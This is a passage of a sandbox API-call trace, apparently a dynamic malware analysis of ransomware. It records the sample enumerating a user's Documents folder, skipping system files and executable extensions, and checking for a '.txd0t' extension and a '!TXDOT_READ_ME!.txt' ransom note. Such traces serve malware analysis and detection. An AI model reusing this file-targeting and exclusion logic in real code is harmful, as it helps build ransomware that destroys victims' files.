dwReserved1=0x0, cFileName="kkcie@kdj.kd.pst", cAlternateFileName="KKCIE@~1.PST")) returned 0 [0074.311] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0074.311] GetProcessHeap () returned 0xe30000 [0074.311] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed31f0 | out: hHeap=0xe30000) returned 1 [0074.311] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97a10cb0, ftCreationTime.dwHighDateTime=0x1d5b064, ftLastAccessTime.dwLowDateTime=0x8f772f70, ftLastAccessTime.dwHighDateTime=0x1d5c4c2, ftLastWriteTime.dwLowDateTime=0x8f772f70, ftLastWriteTime.dwHighDateTime=0x1d5c4c2, nFileSizeHigh=0x0, nFileSizeLow=0x7b58, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QQnuWmakq.docx", cAlternateFileName="QQNUWM~1.DOC")) returned 1 [0074.311] StrCmpW (psz1="QQnuWmakq.docx", psz2=".") returned 1 [0074.311] StrCmpW (psz1="QQnuWmakq.docx", psz2="..") returned 1 [0074.311] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.311] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.311] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="QQnuWmakq.docx", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx") returned="C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx" [0074.311] PathFindExtensionW (pszPath="QQnuWmakq.docx") returned=".docx" [0074.311] StrCmpW (psz1=".docx", psz2=".txd0t") returned -1 [0074.311] StrCmpIW (psz1="QQnuWmakq.docx", psz2="bootsect.bak") returned 1 [0074.311] StrCmpIW (psz1="QQnuWmakq.docx", psz2="iconcache.db") returned 1 [0074.311] StrCmpIW (psz1="QQnuWmakq.docx", psz2="thumbs.db") returned -1 [0074.311] StrCmpIW (psz1="QQnuWmakq.docx", psz2=" ransomware ") returned 1 [0074.311] StrCmpIW (psz1="QQnuWmakq.docx", psz2=" ransom ") returned 1 [0074.311] StrCmpIW (psz1="QQnuWmakq.docx", psz2="debug.txt") returned 1 [0074.311] StrCmpIW (psz1="QQnuWmakq.docx", psz2="boot.ini") returned 1 [0074.311] StrCmpIW (psz1="QQnuWmakq.docx", psz2="desktop.ini") returned 1 [0074.311] StrCmpIW (psz1="QQnuWmakq.docx", psz2="autorun.inf") returned 1 [0074.311] StrCmpIW (psz1="QQnuWmakq.docx", psz2="ntuser.dat") returned 1 [0074.311] StrCmpIW (psz1="QQnuWmakq.docx", psz2="ntldr") returned 1 [0074.311] StrCmpIW (psz1="QQnuWmakq.docx", psz2="ntdetect.com") returned 1 [0074.311] StrCmpIW (psz1="QQnuWmakq.docx", psz2="bootfont.bin") returned 1 [0074.311] StrCmpIW (psz1="QQnuWmakq.docx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.311] PathFindExtensionW (pszPath="QQnuWmakq.docx") returned=".docx" [0074.311] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".docx") returned 0x0 [0074.312] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.312] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.312] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0074.312] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.312] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx" [0074.312] SetEvent (hEvent=0x410) returned 1 [0074.312] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87e473b0, ftCreationTime.dwHighDateTime=0x1d5f07a, ftLastAccessTime.dwLowDateTime=0xe5de8050, ftLastAccessTime.dwHighDateTime=0x1d58ea5, ftLastWriteTime.dwLowDateTime=0xe5de8050, ftLastWriteTime.dwHighDateTime=0x1d58ea5, nFileSizeHigh=0x0, nFileSizeLow=0xe84e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="quCysrsmVF.pptx", cAlternateFileName="QUCYSR~1.PPT")) returned 1 [0074.312] StrCmpW (psz1="quCysrsmVF.pptx", psz2=".") returned 1 [0074.312] StrCmpW (psz1="quCysrsmVF.pptx", psz2="..") returned 1 [0074.312] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.312] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.312] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="quCysrsmVF.pptx", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx") returned="C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx" [0074.312] PathFindExtensionW (pszPath="quCysrsmVF.pptx") returned=".pptx" [0074.312] StrCmpW (psz1=".pptx", psz2=".txd0t") returned -1 [0074.312] StrCmpIW (psz1="quCysrsmVF.pptx", psz2="bootsect.bak") returned 1 [0074.312] StrCmpIW (psz1="quCysrsmVF.pptx", psz2="iconcache.db") returned 1 [0074.312] StrCmpIW (psz1="quCysrsmVF.pptx", psz2="thumbs.db") returned -1 [0074.312] StrCmpIW (psz1="quCysrsmVF.pptx", psz2=" ransomware ") returned 1 [0074.312] StrCmpIW (psz1="quCysrsmVF.pptx", psz2=" ransom ") returned 1 [0074.312] StrCmpIW (psz1="quCysrsmVF.pptx", psz2="debug.txt") returned 1 [0074.312] StrCmpIW (psz1="quCysrsmVF.pptx", psz2="boot.ini") returned 1 [0074.312] StrCmpIW (psz1="quCysrsmVF.pptx", psz2="desktop.ini") returned 1 [0074.312] StrCmpIW (psz1="quCysrsmVF.pptx", psz2="autorun.inf") returned 1 [0074.312] StrCmpIW (psz1="quCysrsmVF.pptx", psz2="ntuser.dat") returned 1 [0074.312] StrCmpIW (psz1="quCysrsmVF.pptx", psz2="ntldr") returned 1 [0074.312] StrCmpIW (psz1="quCysrsmVF.pptx", psz2="ntdetect.com") returned 1 [0074.312] StrCmpIW (psz1="quCysrsmVF.pptx", psz2="bootfont.bin") returned 1 [0074.312] StrCmpIW (psz1="quCysrsmVF.pptx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.313] PathFindExtensionW (pszPath="quCysrsmVF.pptx") returned=".pptx" [0074.313] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".pptx") returned 0x0 [0074.313] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.313] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.313] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0074.313] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.313] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx" [0074.313] SetEvent (hEvent=0x418) returned 1 [0074.313] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab726a00, ftCreationTime.dwHighDateTime=0x1d5ef97, ftLastAccessTime.dwLowDateTime=0x2fc4f790, ftLastAccessTime.dwHighDateTime=0x1d5e364, ftLastWriteTime.dwLowDateTime=0x2fc4f790, ftLastWriteTime.dwHighDateTime=0x1d5e364, nFileSizeHigh=0x0, nFileSizeLow=0x117cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sA2u-LPe-LiGoMos.pdf", cAlternateFileName="SA2U-L~1.PDF")) returned 1 [0074.313] StrCmpW (psz1="sA2u-LPe-LiGoMos.pdf", psz2=".") returned 1 [0074.313] StrCmpW (psz1="sA2u-LPe-LiGoMos.pdf", psz2="..") returned 1 [0074.313] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.313] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.313] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="sA2u-LPe-LiGoMos.pdf", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf") returned="C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf" [0074.313] PathFindExtensionW (pszPath="sA2u-LPe-LiGoMos.pdf") returned=".pdf" [0074.313] StrCmpW (psz1=".pdf", psz2=".txd0t") returned -1 [0074.313] StrCmpIW (psz1="sA2u-LPe-LiGoMos.pdf", psz2="bootsect.bak") returned 1 [0074.313] StrCmpIW (psz1="sA2u-LPe-LiGoMos.pdf", psz2="iconcache.db") returned 1 [0074.313] StrCmpIW (psz1="sA2u-LPe-LiGoMos.pdf", psz2="thumbs.db") returned -1 [0074.313] StrCmpIW (psz1="sA2u-LPe-LiGoMos.pdf", psz2=" ransomware ") returned 1 [0074.313] StrCmpIW (psz1="sA2u-LPe-LiGoMos.pdf", psz2=" ransom ") returned 1 [0074.313] StrCmpIW (psz1="sA2u-LPe-LiGoMos.pdf", psz2="debug.txt") returned 1 [0074.313] StrCmpIW (psz1="sA2u-LPe-LiGoMos.pdf", psz2="boot.ini") returned 1 [0074.313] StrCmpIW (psz1="sA2u-LPe-LiGoMos.pdf", psz2="desktop.ini") returned 1 [0074.313] StrCmpIW (psz1="sA2u-LPe-LiGoMos.pdf", psz2="autorun.inf") returned 1 [0074.313] StrCmpIW (psz1="sA2u-LPe-LiGoMos.pdf", psz2="ntuser.dat") returned 1 [0074.313] StrCmpIW (psz1="sA2u-LPe-LiGoMos.pdf", psz2="ntldr") returned 1 [0074.313] StrCmpIW (psz1="sA2u-LPe-LiGoMos.pdf", psz2="ntdetect.com") returned 1 [0074.313] StrCmpIW (psz1="sA2u-LPe-LiGoMos.pdf", psz2="bootfont.bin") returned 1 [0074.313] StrCmpIW (psz1="sA2u-LPe-LiGoMos.pdf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.314] PathFindExtensionW (pszPath="sA2u-LPe-LiGoMos.pdf") returned=".pdf" [0074.314] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".pdf") returned 0x0 [0074.314] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.314] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.314] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0074.349] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.349] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf" [0074.349] SetEvent (hEvent=0x410) returned 1 [0074.349] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bd450c0, ftCreationTime.dwHighDateTime=0x1d5ea9b, ftLastAccessTime.dwLowDateTime=0xb5159f50, ftLastAccessTime.dwHighDateTime=0x1d5f00a, ftLastWriteTime.dwLowDateTime=0xb5159f50, ftLastWriteTime.dwHighDateTime=0x1d5f00a, nFileSizeHigh=0x0, nFileSizeLow=0xcd06, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="spmR iwVLu JE 9B.rtf", cAlternateFileName="SPMRIW~1.RTF")) returned 1 [0074.349] StrCmpW (psz1="spmR iwVLu JE 9B.rtf", psz2=".") returned 1 [0074.349] StrCmpW (psz1="spmR iwVLu JE 9B.rtf", psz2="..") returned 1 [0074.349] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.349] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.349] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="spmR iwVLu JE 9B.rtf", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf") returned="C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf" [0074.349] PathFindExtensionW (pszPath="spmR iwVLu JE 9B.rtf") returned=".rtf" [0074.349] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0074.349] StrCmpIW (psz1="spmR iwVLu JE 9B.rtf", psz2="bootsect.bak") returned 1 [0074.349] StrCmpIW (psz1="spmR iwVLu JE 9B.rtf", psz2="iconcache.db") returned 1 [0074.349] StrCmpIW (psz1="spmR iwVLu JE 9B.rtf", psz2="thumbs.db") returned -1 [0074.349] StrCmpIW (psz1="spmR iwVLu JE 9B.rtf", psz2=" ransomware ") returned 1 [0074.349] StrCmpIW (psz1="spmR iwVLu JE 9B.rtf", psz2=" ransom ") returned 1 [0074.349] StrCmpIW (psz1="spmR iwVLu JE 9B.rtf", psz2="debug.txt") returned 1 [0074.349] StrCmpIW (psz1="spmR iwVLu JE 9B.rtf", psz2="boot.ini") returned 1 [0074.349] StrCmpIW (psz1="spmR iwVLu JE 9B.rtf", psz2="desktop.ini") returned 1 [0074.349] StrCmpIW (psz1="spmR iwVLu JE 9B.rtf", psz2="autorun.inf") returned 1 [0074.349] StrCmpIW (psz1="spmR iwVLu JE 9B.rtf", psz2="ntuser.dat") returned 1 [0074.349] StrCmpIW (psz1="spmR iwVLu JE 9B.rtf", psz2="ntldr") returned 1 [0074.350] StrCmpIW (psz1="spmR iwVLu JE 9B.rtf", psz2="ntdetect.com") returned 1 [0074.350] StrCmpIW (psz1="spmR iwVLu JE 9B.rtf", psz2="bootfont.bin") returned 1 [0074.350] StrCmpIW (psz1="spmR iwVLu JE 9B.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.350] PathFindExtensionW (pszPath="spmR iwVLu JE 9B.rtf") returned=".rtf" [0074.350] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0074.350] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.350] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.350] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0074.361] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.361] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf" [0074.361] SetEvent (hEvent=0x418) returned 1 [0074.361] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa71682a0, ftCreationTime.dwHighDateTime=0x1d5e783, ftLastAccessTime.dwLowDateTime=0x4ecffce0, ftLastAccessTime.dwHighDateTime=0x1d5e1c8, ftLastWriteTime.dwLowDateTime=0x4ecffce0, ftLastWriteTime.dwHighDateTime=0x1d5e1c8, nFileSizeHigh=0x0, nFileSizeLow=0xee0c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U8_NH2Y.pdf", cAlternateFileName="")) returned 1 [0074.362] StrCmpW (psz1="U8_NH2Y.pdf", psz2=".") returned 1 [0074.362] StrCmpW (psz1="U8_NH2Y.pdf", psz2="..") returned 1 [0074.362] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.362] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.362] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="U8_NH2Y.pdf", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf") returned="C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf" [0074.362] PathFindExtensionW (pszPath="U8_NH2Y.pdf") returned=".pdf" [0074.362] StrCmpW (psz1=".pdf", psz2=".txd0t") returned -1 [0074.362] StrCmpIW (psz1="U8_NH2Y.pdf", psz2="bootsect.bak") returned 1 [0074.362] StrCmpIW (psz1="U8_NH2Y.pdf", psz2="iconcache.db") returned 1 [0074.362] StrCmpIW (psz1="U8_NH2Y.pdf", psz2="thumbs.db") returned 1 [0074.362] StrCmpIW (psz1="U8_NH2Y.pdf", psz2=" ransomware ") returned 1 [0074.362] StrCmpIW (psz1="U8_NH2Y.pdf", psz2=" ransom ") returned 1 [0074.362] StrCmpIW (psz1="U8_NH2Y.pdf", psz2="debug.txt") returned 1 [0074.362] StrCmpIW (psz1="U8_NH2Y.pdf", psz2="boot.ini") returned 1 [0074.362] StrCmpIW (psz1="U8_NH2Y.pdf", psz2="desktop.ini") returned 1 [0074.362] StrCmpIW (psz1="U8_NH2Y.pdf", psz2="autorun.inf") returned 1 [0074.362] StrCmpIW (psz1="U8_NH2Y.pdf", psz2="ntuser.dat") returned 1 [0074.362] StrCmpIW (psz1="U8_NH2Y.pdf", psz2="ntldr") returned 1 [0074.362] StrCmpIW (psz1="U8_NH2Y.pdf", psz2="ntdetect.com") returned 1 [0074.362] StrCmpIW (psz1="U8_NH2Y.pdf", psz2="bootfont.bin") returned 1 [0074.362] StrCmpIW (psz1="U8_NH2Y.pdf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.362] PathFindExtensionW (pszPath="U8_NH2Y.pdf") returned=".pdf" [0074.362] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".pdf") returned 0x0 [0074.362] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.362] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.362] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0074.372] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.372] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf" [0074.372] SetEvent (hEvent=0x410) returned 1 [0074.372] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74e48d30, ftCreationTime.dwHighDateTime=0x1d5e4fa, ftLastAccessTime.dwLowDateTime=0x94f1d180, ftLastAccessTime.dwHighDateTime=0x1d5e475, ftLastWriteTime.dwLowDateTime=0x94f1d180, ftLastWriteTime.dwHighDateTime=0x1d5e475, nFileSizeHigh=0x0, nFileSizeLow=0xebec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UgOWYrVuYDiW8pkWKYl.xls", cAlternateFileName="UGOWYR~1.XLS")) returned 1 [0074.372] StrCmpW (psz1="UgOWYrVuYDiW8pkWKYl.xls", psz2=".") returned 1 [0074.372] StrCmpW (psz1="UgOWYrVuYDiW8pkWKYl.xls", psz2="..") returned 1 [0074.372] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.372] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.372] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="UgOWYrVuYDiW8pkWKYl.xls", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls") returned="C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls" [0074.372] PathFindExtensionW (pszPath="UgOWYrVuYDiW8pkWKYl.xls") returned=".xls" [0074.372] StrCmpW (psz1=".xls", psz2=".txd0t") returned 1 [0074.372] StrCmpIW (psz1="UgOWYrVuYDiW8pkWKYl.xls", psz2="bootsect.bak") returned 1 [0074.372] StrCmpIW (psz1="UgOWYrVuYDiW8pkWKYl.xls", psz2="iconcache.db") returned 1 [0074.372] StrCmpIW (psz1="UgOWYrVuYDiW8pkWKYl.xls", psz2="thumbs.db") returned 1 [0074.372] StrCmpIW (psz1="UgOWYrVuYDiW8pkWKYl.xls", psz2=" ransomware ") returned 1 [0074.372] StrCmpIW (psz1="UgOWYrVuYDiW8pkWKYl.xls", psz2=" ransom ") returned 1 [0074.372] StrCmpIW (psz1="UgOWYrVuYDiW8pkWKYl.xls", psz2="debug.txt") returned 1 [0074.372] StrCmpIW (psz1="UgOWYrVuYDiW8pkWKYl.xls", psz2="boot.ini") returned 1 [0074.372] StrCmpIW (psz1="UgOWYrVuYDiW8pkWKYl.xls", psz2="desktop.ini") returned 1 [0074.372] StrCmpIW (psz1="UgOWYrVuYDiW8pkWKYl.xls", psz2="autorun.inf") returned 1 [0074.372] StrCmpIW (psz1="UgOWYrVuYDiW8pkWKYl.xls", psz2="ntuser.dat") returned 1 [0074.372] StrCmpIW (psz1="UgOWYrVuYDiW8pkWKYl.xls", psz2="ntldr") returned 1 [0074.372] StrCmpIW (psz1="UgOWYrVuYDiW8pkWKYl.xls", psz2="ntdetect.com") returned 1 [0074.372] StrCmpIW (psz1="UgOWYrVuYDiW8pkWKYl.xls", psz2="bootfont.bin") returned 1 [0074.372] StrCmpIW (psz1="UgOWYrVuYDiW8pkWKYl.xls", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.372] PathFindExtensionW (pszPath="UgOWYrVuYDiW8pkWKYl.xls") returned=".xls" [0074.372] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xls") returned 0x0 [0074.372] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.372] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.373] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0074.389] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.389] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls" [0074.390] SetEvent (hEvent=0x418) returned 1 [0074.390] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8695d80, ftCreationTime.dwHighDateTime=0x1d5e7fb, ftLastAccessTime.dwLowDateTime=0xb960170, ftLastAccessTime.dwHighDateTime=0x1d5e567, ftLastWriteTime.dwLowDateTime=0xb960170, ftLastWriteTime.dwHighDateTime=0x1d5e567, nFileSizeHigh=0x0, nFileSizeLow=0xfe9d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ut8OaMa5zK99bj4EvRQ.csv", cAlternateFileName="UT8OAM~1.CSV")) returned 1 [0074.390] StrCmpW (psz1="ut8OaMa5zK99bj4EvRQ.csv", psz2=".") returned 1 [0074.390] StrCmpW (psz1="ut8OaMa5zK99bj4EvRQ.csv", psz2="..") returned 1 [0074.390] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.390] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.390] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", 